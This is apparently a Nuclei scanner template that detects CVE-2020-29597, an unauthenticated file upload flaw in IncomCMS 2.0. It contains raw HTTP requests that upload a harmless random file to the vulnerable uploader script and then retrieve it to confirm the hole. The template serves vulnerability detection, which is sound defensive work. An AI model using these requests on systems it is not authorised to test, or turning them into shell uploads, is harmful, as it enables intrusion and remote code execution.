id: CVE-2020-29597

info:
  name: IncomCMS 2.0 - Arbitrary File Upload
  author: princechaddha
  severity: critical
  description: |
    IncomCMS 2.0 has an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patch or update to a version that addresses the vulnerability.
  reference:
    - https://github.com/Trhackno/CVE-2020-29597
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29597
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
    - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
    - https://github.com/trhacknon/CVE-2020-29597
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29597
    cwe-id: CWE-434
    epss-score: 0.78448
    epss-percentile: 0.9817
    cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incomcms_project
    product: incomcms
  tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project

http:
  - raw:
      - |
        POST /incom/modules/uploader/showcase/script.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt

        ------WebKitFormBoundaryBEJZt0IK73M2mAbt
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
        Content-Type: text/html

        {{randstr_2}}
        ------WebKitFormBoundaryBEJZt0IK73M2mAbt--
      - |
        GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{"status":"1","name":"{{randstr_1}}.png"}'

      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'
# digest: 4a0a00473045022100ab5832fbca2af41f73d0a9dd5b7e6a5d11131ec0ef50cf26f0613d515b953718022046f83ee4202dafd7b1a1b379f116c6d1a31b1ebe1dc45a9e355c444f9e84e968:922c64590222798bb761d5b6d8e72950